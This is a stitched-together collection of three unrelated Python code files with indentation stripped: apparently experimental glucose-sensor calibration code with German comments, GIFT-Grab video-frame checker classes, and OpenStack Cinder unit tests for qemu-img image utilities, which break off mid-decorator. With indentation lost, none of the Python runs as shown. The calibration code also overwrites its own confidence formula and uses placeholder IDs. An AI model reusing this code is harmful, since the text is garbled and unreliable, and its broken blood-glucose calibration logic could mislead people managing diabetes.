bgReading.getlatest()
bgReadingsec.getsecondlatest()
if (bgReading._id <> 0):
calibration.sensor = sensor;
calibration.bg = bg;
calibration.check_in = False;
calibration.timestamp = long(str(int(time.time()))+"000")
calibration.raw_value = bgReading.raw_value;
calibration.age_adjusted_raw_value = bgReading.age_adjusted_raw_value;
calibration.sensor_uuid = "Sensor_uuid";
print "(create) bgReading.bg -> " + str(bgReading.bg)
print "(create) bgReadingsec.bg -> " + str(bgReadingsec.bg)
print "(create) abs(bgReading.bg - bgReadingsec.bg) -> " + str(abs(bgReading.bg - bgReadingsec.bg))
calibration.slope_confidence = min(max((( 4 - (abs(bgReading.bg - bgReadingsec.bg) * 60000))/4), 0), 1);
print "(create) calibration.slope_confidence -> " + str(calibration.slope_confidence )
calibration.slope_confidence = (100-abs(bgReading.bg - bgReadingsec.bg))/100
print "(create) calibration.slope_confidence -> " + str(calibration.slope_confidence )
estimated_raw_bg_value = estimated_raw_bg(long(str(int(time.time()))+"000"));
calibration.raw_timestamp = bgReading.timestamp;
print "(create) estimated_raw_bg_value ->" + str(estimated_raw_bg_value)
print "(create) bgReading.age_adjusted_raw_value ->" + str(bgReading.age_adjusted_raw_value)
if (abs(estimated_raw_bg_value - bgReading.age_adjusted_raw_value) > 20):
print "create(bg) bgReading.age_adjusted_raw_value ->" + str(bgReading.age_adjusted_raw_value)
calibration.estimate_raw_at_time_of_calibration = bgReading.age_adjusted_raw_value
else:
print "create(bg)estimated_raw_bg_value ->" + str(estimated_raw_bg_value)
calibration.estimate_raw_at_time_of_calibration = estimated_raw_bg_value
calibration.distance_from_estimate = abs(calibration.bg - bgReading.bg);
calibration.sensor_confidence = max(((-0.0018 * bg * bg) + (0.6657 * bg) + 36.7505) / 100, 0);
calibration.sensor_age_at_time_of_estimation = calibration.timestamp - sens['started_at'];
calibration.uuid = "CalUUI"
calibration.save();
bgReading.calibration = calibration;
bgReading.calibration_flag = True;
bgReading.write2db();
#BgSendQueue.handleNewBgReading(bgReading, "update", context);
calculate_w_l_s();
#adjustRecentBgReadings();
#CalibrationSendQueue.addToQueue(calibration, context);
#context.startService(new Intent(context, Notifications.class));
#Calibration.requestCalibrationIfRangeTooNarrow();
else:
print "CALIBRATION", "No sensor, cant save!"
def initialCalibration( bg1, bg2 ):
#calib = calibration_Data()
#calib.clear_all_existing_calibrations()
higherCalibration = calibration_Data();
lowerCalibration = calibration_Data();
sens = sensor.currentSensor()
higher_bg = max(bg1, bg2);
lower_bg = min(bg1, bg2);
BgReading1=BGReadings_Data()
BgReading1.getlatest()
BgReading2=BGReadings_Data()
BgReading2.getsecondlatest()
if BgReading2.raw_value == None :
print "(initialCalibration) Hmm benoetige ersteinmal 2 BG Readings"
return False
if BgReading1.raw_value > BgReading2.raw_value:
highBgReading=BGReadings_Data()
highBgReading.getlatest()
lowBgReading=BGReadings_Data()
lowBgReading.getsecondlatest()
else:
highBgReading=BGReadings_Data()
highBgReading.getsecondlatest()
lowBgReading=BGReadings_Data()
lowBgReading.getlatest()
print "highBgReading.raw_value -> " + str(highBgReading.raw_value)
print "lowBgReading.raw_value -> " + str(lowBgReading.raw_value)
higherCalibration.bg = higher_bg
higherCalibration.slope = 1
higherCalibration.intercept = higher_bg
print "cal high intercept " + str(higherCalibration.intercept)
print "cal high adjraw " + str(highBgReading.age_adjusted_raw_value)
print "cal high higherbg " + str(higher_bg)
higherCalibration.sensor = sens
higherCalibration.estimate_raw_at_time_of_calibration = highBgReading.age_adjusted_raw_value
higherCalibration.age_adjusted_raw_value = highBgReading.age_adjusted_raw_value
higherCalibration.raw_value = highBgReading.raw_value
higherCalibration.raw_timestamp = highBgReading.raw_timestamp
higherCalibration.save()
highBgReading.bg = higher_bg
highBgReading.calibration_flag = True
highBgReading.calibration = higherCalibration
higherCalibration.save()
lowerCalibration.bg = lower_bg
lowerCalibration.slope = 1
lowerCalibration.intercept = lower_bg
print "cal low intercept " + str(lowerCalibration.intercept)
print "cal low adjraw " + str(lowBgReading.age_adjusted_raw_value)
print "cal low higherbg " + str(lower_bg)
lowerCalibration.sensor = sens
lowerCalibration.estimate_raw_at_time_of_calibration = lowBgReading.age_adjusted_raw_value
lowerCalibration.age_adjusted_raw_value = lowBgReading.age_adjusted_raw_value
lowerCalibration.raw_value = lowBgReading.raw_value
lowerCalibration.raw_timestamp = lowBgReading.raw_timestamp
lowBgReading.bg = lower_bg
lowBgReading.calibration_flag = True
lowBgReading.calibration = lowerCalibration
lowerCalibration.save()
# lowBgReading.timestamp=long(str(int(time.time()))+"000")
lowBgReading.sensor_uuid='Sensor_uuid'
lowBgReading.slope_confidence = 0.5
lowBgReading.distance_from_estimate = 0
lowBgReading.check_in = False
lowBgReading.sensor_confidence = ((-0.0018 * lowBgReading.bg * lowBgReading.bg) + (0.6657 * lowBgReading.bg) + 36.7505) / 100;
lowBgReading.sensor_age_at_time_of_estimation = lowBgReading.timestamp - sens['started_at']
lowBgReading.uuid = 'randomUUID'
lowBgReading.write2db()
# highBgReading.timestamp=long(str(int(time.time()))+"000")
highBgReading.sensor_uuid='Sensor_uuid'
highBgReading.slope_confidence = 0.5
highBgReading.distance_from_estimate = 0
highBgReading.check_in = False
highBgReading.sensor_confidence = ((-0.0018 * highBgReading.bg * highBgReading.bg) + (0.6657 * highBgReading.bg) + 36.7505) / 100;
highBgReading.sensor_age_at_time_of_estimation = highBgReading.timestamp - sens['started_at']
highBgReading.uuid = 'randomUUID'
highBgReading.write2db()
find_new_curve()
find_new_raw_curve()
#highBgReading.find_new_raw_curve();
#lowBgReading.find_new_curve();
#lowBgReading.find_new_raw_curve();
lowerCalibration.timestamp = long(str(int(time.time()))+"000")
lowerCalibration.sensor_uuid = sens['uuid']
lowerCalibration.slope_confidence = 0.5
lowerCalibration.distance_from_estimate = 0
lowerCalibration.check_in = False
lowerCalibration.sensor_confidence = ((-0.0018 * lowerCalibration.bg * lowerCalibration.bg) + (0.6657 * lowerCalibration.bg) + 36.7505) / 100
lowerCalibration.sensor_age_at_time_of_estimation = lowerCalibration.timestamp - sens['started_at']
lowerCalibration.uuid = "CALIBRATION UUID"
# lowerCalibration.calculate_w_l_s()
lowerCalibration.save()
higherCalibration.timestamp = long(str(int(time.time()))+"000")
higherCalibration.sensor_uuid = sens['uuid']
higherCalibration.slope_confidence = 0.5
higherCalibration.distance_from_estimate = 0
higherCalibration.check_in = False
higherCalibration.sensor_confidence = ((-0.0018 * higherCalibration.bg * higherCalibration.bg) + (0.6657 * higherCalibration.bg) + 36.7505) / 100
higherCalibration.sensor_age_at_time_of_estimation = higherCalibration.timestamp - sens['started_at']
higherCalibration.uuid = "CALIBRATION UUID"
higherCalibration.save()
calculate_w_l_s()
# Todo macht sinn umzusetzen !!
#adjustRecentBgReadings(5);
#CalibrationRequest.createOffset(lowerCalibration.bg, 35);
#context.startService(new Intent(context, Notifications.class));
def calculate_w_l_s_old():
calibration=calibration_Data()
calibration.getlatest()
if calibration.sensorid<>0:
l = 0.0;
m = 0.0;
n = 0.0;
p = 0.0;
q = 0.0;
w = 0.0
calibrations = calibration.allForSensorInLastFourDays() # 5 days was a bit much, dropped this to 4
# Also eigentlich kann der code hier nie durchkommen. Versteckter Hinweis bei der initial calibrierung werden bereits 2 objecte erzeugt.
if (len(calibrations) == 1):
calibration.slope = 1;
calibration.intercept = calibration.bg - (calibration.raw_value * calibration.slope);
else:
for c in calibrations:
sensor_age_at_time_of_estimation=c[2]
bg=c[4]
sensor_confidence=c[8]
slope_confidence=c[9]
estimate_raw_at_time_of_calibration=c[14]/1000
print "(calculate_w_l_s)(loop) sensor_age_at_time_of_estimation " + str(sensor_age_at_time_of_estimation)
print "(calculate_w_l_s)(loop) sensor_confidence " + str(sensor_confidence)
print "(calculate_w_l_s)(loop) slope_confidence " + str(slope_confidence)
print "(calculate_w_l_s)(loop) bg " + str(bg)
print "(calculate_w_l_s)(loop) estimate_raw_at_time_of_calibration " + str(estimate_raw_at_time_of_calibration)
w = calculateWeight(sensor_age_at_time_of_estimation,slope_confidence,sensor_confidence);
l += (w);
m += (w * estimate_raw_at_time_of_calibration);
q += (w * estimate_raw_at_time_of_calibration * bg);
n += (w * estimate_raw_at_time_of_calibration * estimate_raw_at_time_of_calibration);
p += (w * bg);
last_calibration = calibration_Data()
last_calibration.getlatest()
#w = ( calculateWeight(last_calibration.sensor_age_at_time_of_estimation,last_calibration.slope_confidence,last_calibration.sensor_confidence) * (len(c) * 0.14));
w = ( calculateWeight(last_calibration.sensor_age_at_time_of_estimation,last_calibration.slope_confidence,last_calibration.sensor_confidence));
l += (w);
m += (w * last_calibration.estimate_raw_at_time_of_calibration/1000);
n += (w * (last_calibration.estimate_raw_at_time_of_calibration/1000) * (last_calibration.estimate_raw_at_time_of_calibration/1000));
p += (w * last_calibration.bg);
q += (w * (last_calibration.estimate_raw_at_time_of_calibration/1000) * last_calibration.bg);
print "(calculate_w_l_s)(loop) last_calibration.bg " + str(last_calibration.bg)
print "(calculate_w_l_s)(loop) .last_calibrationestimate_raw_at_time_of_calibration " + str(last_calibration.estimate_raw_at_time_of_calibration/1000)
d = ((l * n) - (m * m));
print "w ->" + str(w)
print "l ->" + str(l)
print "n ->" + str(n)
print "p ->" + str(p)
print "m ->" + str(m)
print "q ->" + str(q)
print "d ->" + str(d)
print "n*p" + str(n*p)
print "m*q" + str(m*q)
calibration.intercept = ((n * p) - (m * q)) / d;
calibration.slope = ((l * q) - (m * p)) / d;
print "(1) Calculated Calibration Slope: " + str(calibration.slope)
print "(1) Calculated Calibration intercept: " + str(calibration.intercept)
# TODO Denke hier ist einer der interessantesten Teile der Software.
if 1==1:
if ((len(calibrations) == 2 and calibration.slope < 0.95) or (calibration.slope < 0.85)):
# I have not seen a case where a value below 7.5 proved to be accurate but we should keep an eye on this
calibration.slope = slopeOOBHandler(0);
if(len(calibrations) > 2):
calibration.possible_bad = True
print "calibration.bg-> " + str(calibration.bg)
print "calibration.estimate_raw_at_time_of_calibration -> " + str(calibration.estimate_raw_at_time_of_calibration)
print "calibration.slope -> " + str(calibration.slope)
calibration.intercept = calibration.bg - ((calibration.estimate_raw_at_time_of_calibration*1.0/1000) * calibration.slope)
# CalibrationRequest.createOffset(calibration.bg, 25);
if ((len(calibrations) == 2 and calibration.slope > 1.3) or (calibration.slope > 1.4)):
calibration.slope = slopeOOBHandler(1);
if(len(calibrations) > 2):
calibration.possible_bad = True
print "(calibration.bg) ->" + str(calibration.bg)
# Hier ist eine Null drin !!!!
print "(calibration.estimate_raw_at_time_of_calibration) ->" + str(calibration.estimate_raw_at_time_of_calibration)
print "(calibration.slope) ->" + str(calibration.slope)
calibration.intercept = calibration.bg - ((calibration.estimate_raw_at_time_of_calibration*1.0/1000) * calibration.slope)
# CalibrationRequest.createOffset(calibration.bg, 25);
print "(2) Calculated Calibration Slope: " + str(calibration.slope)
print "(2) Calculated Calibration intercept: " + str(calibration.intercept)
calibration.save();
else:
print "NO Current active sensor found!!"
|
|
import time
import datetime
import pygiftgrab as pgg
use_numpy = True
try:
import numpy as np
except ImportError:
use_numpy = False
class StereoFrameBackwardsCompatibilityChecker(pgg.IObserver):
"""Descendant of GIFT-Grab's `Observer`, which will
listen to `Observable`s for some time and when asked,
will report whether the video source has been sending
stereo frames that are backwards compatible with the
GIFT-Grab NumPy data interface.
"""
def __init__(self):
super(StereoFrameBackwardsCompatibilityChecker, self).__init__()
self.obtained_backwards_compatible_frames = []
def update(self, frame):
frame_backwards_compatible = True
frame_backwards_compatible &= np.array_equal(frame.data(), frame.data(False))
frame_backwards_compatible &= np.array_equal(frame.data(), frame.data(False, 0))
frame_backwards_compatible &= frame.data_length() == frame.data_length(0)
self.obtained_backwards_compatible_frames.append(frame_backwards_compatible)
def __bool__(self):
if not self.obtained_backwards_compatible_frames:
return False
for backwards_compatibility in self.obtained_backwards_compatible_frames:
if not backwards_compatibility:
return False
return True
class StereoFrameNumpyCompatibilityChecker(pgg.IObserver):
"""Descendant of GIFT-Grab's `Observer`, which will
listen to `Observable`s for some time and when asked,
will report whether the video source has been sending
stereo frames that are compatible with the GIFT-Grab
NumPy data interface.
"""
def __init__(self, colour):
super(StereoFrameNumpyCompatibilityChecker, self).__init__()
self.obtained_numpy_compatible_stereo_frames = []
# currently structured NumPy arrays are supported
# only for BGRA frames
self.structured_flags = [colour == pgg.ColourSpace.BGRA]
if self.structured_flags[-1]:
self.structured_flags.append(False)
def update(self, frame):
self.obtained_numpy_compatible_stereo_frames.append(True)
if frame.stereo_count() <= 1:
self.obtained_numpy_compatible_stereo_frames[-1] = False
return
frames_numpy_compatible = True
for structured_flag in self.structured_flags:
frames_numpy_compatible &= np.array_equal(frame.data(structured_flag), frame.data(structured_flag, 0))
if not frames_numpy_compatible:
self.obtained_numpy_compatible_stereo_frames[-1] = False
return
for index in range(frame.stereo_count()):
data_np = frame.data(structured_flag, index)
frames_numpy_compatible &= data_np.dtype == np.uint8
data_len = frame.data_length(index)
frames_numpy_compatible &= data_len == data_np.size
if structured_flag:
frames_numpy_compatible &= data_np.shape[:2] == (frame.rows(), frame.cols())
else:
try:
data_np[data_len]
except IndexError:
pass
else:
frames_numpy_compatible = False
if not frames_numpy_compatible:
self.obtained_numpy_compatible_stereo_frames[-1] = False
return
self.obtained_numpy_compatible_stereo_frames[-1] = frames_numpy_compatible
def __bool__(self):
if not self.obtained_numpy_compatible_stereo_frames:
return False
for numpy_compatibility in self.obtained_numpy_compatible_stereo_frames:
if not numpy_compatibility:
return False
return True
class StereoFrameConsistencyChecker(pgg.IObserver):
"""Descendant of GIFT-Grab's `Observer`, which
will listen to `Observable`s for some time and
when asked, will report whether the video
source has been sending consistent stereo frames
consistently.
"""
def __init__(self):
super(StereoFrameConsistencyChecker, self).__init__()
self.obtained_consistent_stereo_frames = []
def update(self, frame):
self.obtained_consistent_stereo_frames.append(True)
if frame.stereo_count() <= 1:
self.obtained_consistent_stereo_frames[-1] = False
return
frames_consistent = True
for index in range(frame.stereo_count() - 1):
this_data = frame.data(False, index)
next_data = frame.data(False, index + 1)
if this_data.size == 0:
frames_consistent = False
break
if this_data.shape != next_data.shape:
frames_consistent = False
break
if np.array_equal(this_data, next_data):
frames_consistent = False
break
if not frames_consistent:
self.obtained_consistent_stereo_frames[-1] = False
def __bool__(self):
if not self.obtained_consistent_stereo_frames:
return False
for consistency in self.obtained_consistent_stereo_frames:
if not consistency:
return False
return True
class FrameRateTimer(pgg.IObserver):
"""Descendant of GIFT-Grab's `Observer`, which
will listen to `Observable`s for some time and
when asked, will report whether data has been
sent at the specified frame rate.
"""
def __init__(self, frame_rate, init_time = 0):
super(FrameRateTimer, self).__init__()
self._frame_rate = frame_rate
# all data for this initial period (in sec) will be discarded
self._init_time = init_time
if use_numpy:
self._timestamps = np.array([], dtype='datetime64[us]')
else:
self._timestamps = []
def update(self, frame):
if use_numpy:
self._timestamps = np.append(self._timestamps,
np.datetime64(datetime.datetime.now()))
else:
self._timestamps.append(datetime.datetime.now())
def __bool__(self):
"""Check if updates have been in time intervals
in line with defined frame rate, also resetting
all saved timestamps, i.e. ready for next round.
"""
global use_numpy
n_init_items = int(self._init_time * self._frame_rate)
if use_numpy:
if n_init_items >= self._timestamps.size:
raise IndexError('Not enough data collected')
else:
if n_init_items >= len(self._timestamps):
raise IndexError('Not enough data collected')
timestamps = self._timestamps[n_init_items:]
if use_numpy:
intervals = timestamps[1:] - timestamps[0]
frame_rates = np.array(
[(i + 1) / (interval / np.timedelta64(1, 's'))
for i, interval in enumerate(intervals)]
)
return np.min(frame_rates) >= self._frame_rate
else:
intervals = [
(timestamp - timestamps[0]).total_seconds()
for timestamp in timestamps[1:]
]
frame_rates = [(i + 1) / interval for i, interval in enumerate(intervals)]
return min(frame_rates) >= self._frame_rate
def __nonzero__(self):
if self.__bool__():
return 1
else:
return 0
class VideoFrameDesc:
"""Descriptor that memorises the specs of a
given video frame, without copying its data.
"""
def __init__(self, frame):
self.cols = frame.cols()
self.rows = frame.rows()
self.colour = frame.colour()
self.data_length = frame.data_length()
class FileChecker(pgg.IObserver):
"""Descendant of GIFT-Grab's `Observer`, which
listens to an `Observable` reading video frames
from files and reports the file reader's specs,
e.g. frame rate, frame count.
"""
def __init__(self, file_reader):
super(FileChecker, self).__init__()
self._file_reader = file_reader
self._frame_descs = []
def attach(self):
if self._file_reader is not None:
self._file_reader.attach(self)
def detach(self):
if self._file_reader is not None:
self._file_reader.detach(self)
def update(self, frame):
self._frame_descs.append(VideoFrameDesc(frame))
def assert_data(self):
return len(self._frame_descs) > 0
def assert_colour(self, colour):
for frame_desc in self._frame_descs:
if frame_desc.colour != colour:
return False
return True
def assert_frame_rate(self, frame_rate):
if self._file_reader.get_frame_rate() != frame_rate:
return False
else:
return True
def assert_frame_dimensions(self,
frame_width, frame_height):
for frame_desc in self._frame_descs:
if frame_desc.cols != frame_width or\
frame_desc.rows != frame_height:
return False
return True
def assert_frame_data_lengths(self, colour,
frame_width, frame_height):
exp_data_length = pgg.VideoFrame.required_data_length(
colour, frame_width, frame_height
)
for frame_desc in self._frame_descs:
data_length = frame_desc.data_length
if data_length != exp_data_length:
return False
return True
|
|
# Copyright (c) 2013 eNovance , Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for image utils."""
import math
import mock
from oslo_concurrency import processutils
from oslo_utils import units
from cinder import exception
from cinder.image import image_utils
from cinder import test
from cinder.volume import throttling
class TestQemuImgInfo(test.TestCase):
@mock.patch('cinder.openstack.common.imageutils.QemuImgInfo')
@mock.patch('cinder.utils.execute')
def test_qemu_img_info(self, mock_exec, mock_info):
mock_out = mock.sentinel.out
mock_err = mock.sentinel.err
test_path = mock.sentinel.path
mock_exec.return_value = (mock_out, mock_err)
output = image_utils.qemu_img_info(test_path)
mock_exec.assert_called_once_with('env', 'LC_ALL=C', 'qemu-img',
'info', test_path, run_as_root=True)
self.assertEqual(mock_info.return_value, output)
@mock.patch('cinder.openstack.common.imageutils.QemuImgInfo')
@mock.patch('cinder.utils.execute')
def test_qemu_img_info_not_root(self, mock_exec, mock_info):
mock_out = mock.sentinel.out
mock_err = mock.sentinel.err
test_path = mock.sentinel.path
mock_exec.return_value = (mock_out, mock_err)
output = image_utils.qemu_img_info(test_path, run_as_root=False)
mock_exec.assert_called_once_with('env', 'LC_ALL=C', 'qemu-img',
'info', test_path, run_as_root=False)
self.assertEqual(mock_info.return_value, output)
@mock.patch('cinder.image.image_utils.os')
@mock.patch('cinder.openstack.common.imageutils.QemuImgInfo')
@mock.patch('cinder.utils.execute')
def test_qemu_img_info_on_nt(self, mock_exec, mock_info, mock_os):
mock_out = mock.sentinel.out
mock_err = mock.sentinel.err
test_path = mock.sentinel.path
mock_exec.return_value = (mock_out, mock_err)
mock_os.name = 'nt'
output = image_utils.qemu_img_info(test_path)
mock_exec.assert_called_once_with('qemu-img', 'info', test_path,
run_as_root=True)
self.assertEqual(mock_info.return_value, output)
@mock.patch('cinder.utils.execute')
def test_get_qemu_img_version(self, mock_exec):
mock_out = "qemu-img version 2.0.0"
mock_err = mock.sentinel.err
mock_exec.return_value = (mock_out, mock_err)
expected_version = [2, 0, 0]
version = image_utils.get_qemu_img_version()
mock_exec.assert_called_once_with('qemu-img', '--help',
check_exit_code=False)
self.assertEqual(expected_version, version)
@mock.patch.object(image_utils, 'get_qemu_img_version')
def test_validate_qemu_img_version(self, mock_get_qemu_img_version):
fake_current_version = [1, 8]
mock_get_qemu_img_version.return_value = fake_current_version
minimum_version = '1.8'
image_utils.check_qemu_img_version(minimum_version)
mock_get_qemu_img_version.assert_called_once_with()
@mock.patch.object(image_utils, 'get_qemu_img_version')
def _test_validate_unsupported_qemu_img_version(self,
mock_get_qemu_img_version,
current_version=None):
mock_get_qemu_img_version.return_value = current_version
minimum_version = '2.0'
self.assertRaises(exception.VolumeBackendAPIException,
image_utils.check_qemu_img_version,
minimum_version)
mock_get_qemu_img_version.assert_called_once_with()
def test_validate_qemu_img_version_not_installed(self):
self._test_validate_unsupported_qemu_img_version()
def test_validate_older_qemu_img_version(self):
self._test_validate_unsupported_qemu_img_version(
current_version=[1, 8])
class TestConvertImage(test.TestCase):
@mock.patch('cinder.image.image_utils.os.stat')
@mock.patch('cinder.utils.execute')
@mock.patch('cinder.utils.is_blk_device', return_value=True)
def test_defaults_block_dev(self, mock_isblk, mock_exec,
mock_stat):
source = mock.sentinel.source
dest = mock.sentinel.dest
out_format = mock.sentinel.out_format
mock_stat.return_value.st_size = 1048576
throttle = throttling.Throttle(prefix=['cgcmd'])
with mock.patch('cinder.volume.utils.check_for_odirect_support',
return_value=True):
output = image_utils.convert_image(source, dest, out_format,
throttle=throttle)
self.assertIsNone(output)
mock_exec.assert_called_once_with('cgcmd', 'qemu-img', 'convert',
'-t', 'none', '-O', out_format,
source, dest, run_as_root=True)
mock_exec.reset_mock()
with mock.patch('cinder.volume.utils.check_for_odirect_support',
return_value=False):
output = image_utils.convert_image(source, dest, out_format)
self.assertIsNone(output)
mock_exec.assert_called_once_with('qemu-img', 'convert',
'-O', out_format, source, dest,
run_as_root=True)
@mock.patch('cinder.volume.utils.check_for_odirect_support',
return_value=True)
@mock.patch('cinder.image.image_utils.os.stat')
@mock.patch('cinder.utils.execute')
@mock.patch('cinder.utils.is_blk_device', return_value=False)
def test_defaults_not_block_dev(self, mock_isblk, mock_exec,
mock_stat, mock_odirect):
source = mock.sentinel.source
dest = mock.sentinel.dest
out_format = mock.sentinel.out_format
mock_stat.return_value.st_size = 1048576
output = image_utils.convert_image(source, dest, out_format)
self.assertIsNone(output)
mock_exec.assert_called_once_with('qemu-img', 'convert', '-O',
out_format, source, dest,
run_as_root=True)
class TestResizeImage(test.TestCase):
@mock.patch('cinder.utils.execute')
def test_defaults(self, mock_exec):
source = mock.sentinel.source
size = mock.sentinel.size
output = image_utils.resize_image(source, size)
self.assertIsNone(output)
mock_exec.assert_called_once_with('qemu-img', 'resize', source,
'sentinel.sizeG', run_as_root=False)
@mock.patch('cinder.utils.execute')
def test_run_as_root(self, mock_exec):
source = mock.sentinel.source
size = mock.sentinel.size
output = image_utils.resize_image(source, size, run_as_root=True)
self.assertIsNone(output)
mock_exec.assert_called_once_with('qemu-img', 'resize', source,
'sentinel.sizeG', run_as_root=True)
class TestFetch(test.TestCase):
@mock.patch('os.stat')
@mock.patch('cinder.image.image_utils.fileutils')
def test_defaults(self, mock_fileutils, mock_stat):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
path = 'test_path'
_user_id = mock.sentinel._user_id
_project_id = mock.sentinel._project_id
mock_open = mock.mock_open()
mock_stat.return_value.st_size = 1048576
with mock.patch('cinder.image.image_utils.open',
new=mock_open, create=True):
output = image_utils.fetch(ctxt, image_service, image_id, path,
_user_id, _project_id)
self.assertIsNone(output)
image_service.download.assert_called_once_with(ctxt, image_id,
mock_open.return_value)
mock_open.assert_called_once_with(path, 'wb')
mock_fileutils.remove_path_on_error.assert_called_once_with(path)
(mock_fileutils.remove_path_on_error.return_value.__enter__
.assert_called_once_with())
(mock_fileutils.remove_path_on_error.return_value.__exit__
.assert_called_once_with(None, None, None))
class TestVerifyImage(test.TestCase):
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.fileutils')
@mock.patch('cinder.image.image_utils.fetch')
def test_defaults(self, mock_fetch, mock_fileutils, mock_info):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
mock_data = mock_info.return_value
mock_data.file_format = 'test_format'
mock_data.backing_file = None
output = image_utils.fetch_verify_image(ctxt, image_service,
image_id, dest)
self.assertIsNone(output)
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
dest, None, None)
mock_info.assert_called_once_with(dest, run_as_root=True)
mock_fileutils.remove_path_on_error.assert_called_once_with(dest)
(mock_fileutils.remove_path_on_error.return_value.__enter__
.assert_called_once_with())
(mock_fileutils.remove_path_on_error.return_value.__exit__
.assert_called_once_with(None, None, None))
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.fileutils')
@mock.patch('cinder.image.image_utils.fetch')
def test_kwargs(self, mock_fetch, mock_fileutils, mock_info):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
user_id = mock.sentinel.user_id
project_id = mock.sentinel.project_id
size = 2
run_as_root = mock.sentinel.run_as_root
mock_data = mock_info.return_value
mock_data.file_format = 'test_format'
mock_data.backing_file = None
mock_data.virtual_size = 1
output = image_utils.fetch_verify_image(
ctxt, image_service, image_id, dest, user_id=user_id,
project_id=project_id, size=size, run_as_root=run_as_root)
self.assertIsNone(output)
mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
dest, None, None)
mock_info.assert_called_once_with(dest, run_as_root=run_as_root)
mock_fileutils.remove_path_on_error.assert_called_once_with(dest)
(mock_fileutils.remove_path_on_error.return_value.__enter__
.assert_called_once_with())
(mock_fileutils.remove_path_on_error.return_value.__exit__
.assert_called_once_with(None, None, None))
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.fileutils')
@mock.patch('cinder.image.image_utils.fetch')
def test_format_error(self, mock_fetch, mock_fileutils, mock_info):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
mock_data = mock_info.return_value
mock_data.file_format = None
mock_data.backing_file = None
self.assertRaises(exception.ImageUnacceptable,
image_utils.fetch_verify_image,
ctxt, image_service, image_id, dest)
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.fileutils')
@mock.patch('cinder.image.image_utils.fetch')
def test_backing_file_error(self, mock_fetch, mock_fileutils, mock_info):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
mock_data = mock_info.return_value
mock_data.file_format = 'test_format'
mock_data.backing_file = 'test_backing_file'
self.assertRaises(exception.ImageUnacceptable,
image_utils.fetch_verify_image,
ctxt, image_service, image_id, dest)
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.fileutils')
@mock.patch('cinder.image.image_utils.fetch')
def test_size_error(self, mock_fetch, mock_fileutils, mock_info):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_id = mock.sentinel.image_id
dest = mock.sentinel.dest
size = 1
mock_data = mock_info.return_value
mock_data.file_format = 'test_format'
mock_data.backing_file = None
mock_data.virtual_size = 2
self.assertRaises(exception.ImageUnacceptable,
image_utils.fetch_verify_image,
ctxt, image_service, image_id, dest, size=size)
class TestTemporaryDir(test.TestCase):
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('os.makedirs')
@mock.patch('os.path.exists', return_value=True)
@mock.patch('cinder.image.image_utils.utils.tempdir')
def test_conv_dir_exists(self, mock_tempdir, mock_exists, mock_make,
mock_conf):
mock_conf.image_conversion_dir = mock.sentinel.conv_dir
output = image_utils.temporary_dir()
self.assertFalse(mock_make.called)
mock_tempdir.assert_called_once_with(dir=mock.sentinel.conv_dir)
self.assertEqual(output, mock_tempdir.return_value)
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('os.makedirs')
@mock.patch('os.path.exists', return_value=False)
@mock.patch('cinder.image.image_utils.utils.tempdir')
def test_create_conv_dir(self, mock_tempdir, mock_exists, mock_make,
mock_conf):
mock_conf.image_conversion_dir = mock.sentinel.conv_dir
output = image_utils.temporary_dir()
mock_make.assert_called_once_with(mock.sentinel.conv_dir)
mock_tempdir.assert_called_once_with(dir=mock.sentinel.conv_dir)
self.assertEqual(output, mock_tempdir.return_value)
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('os.makedirs')
@mock.patch('os.path.exists', return_value=False)
@mock.patch('cinder.image.image_utils.utils.tempdir')
def test_no_conv_dir(self, mock_tempdir, mock_exists, mock_make,
mock_conf):
mock_conf.image_conversion_dir = None
output = image_utils.temporary_dir()
self.assertFalse(mock_make.called)
mock_tempdir.assert_called_once_with(dir=None)
self.assertEqual(output, mock_tempdir.return_value)
class TestUploadVolume(test.TestCase):
@mock.patch('cinder.image.image_utils.CONF')
@mock.patch('cinder.image.image_utils.fileutils.file_open')
@mock.patch('cinder.image.image_utils.qemu_img_info')
@mock.patch('cinder.image.image_utils.convert_image')
@mock.patch('cinder.image.image_utils.temporary_file')
@mock.patch('cinder.image.image_utils.os')
def test_diff_format(self, mock_os, mock_temp, mock_convert, mock_info,
mock_open, mock_conf):
ctxt = mock.sentinel.context
image_service = mock.Mock()
image_meta = {'id': 'test_id',
'disk_format': mock.sentinel.disk_format}
volume_path = mock.sentinel.volume_path
mock_os.name = 'posix'
data = mock_info.return_value
data.file_format = mock.sentinel.disk_format
data.backing_file = None
temp_file = mock_temp.return_value.__enter__.return_value
output = image_utils.upload_volume(ctxt, image_service, image_meta,
volume_path)
self.assertIsNone(output)
mock_convert.assert_called_once_with(volume_path,
temp_file,
mock.sentinel.disk_format,
run_as_root=True)
mock_info.assert_called_with(temp_file, run_as_root=True)
self.assertEqual(2, mock_info.call_count)
mock_open.assert_called_once_with(temp_file, 'rb')
image_service.update.assert_called_once_with(
ctxt, image_meta['id'], {},
mock_open.return_value.__enter__.return_value)
@mock.patch('cinder.image.image_utils.utils.temporary_chown')
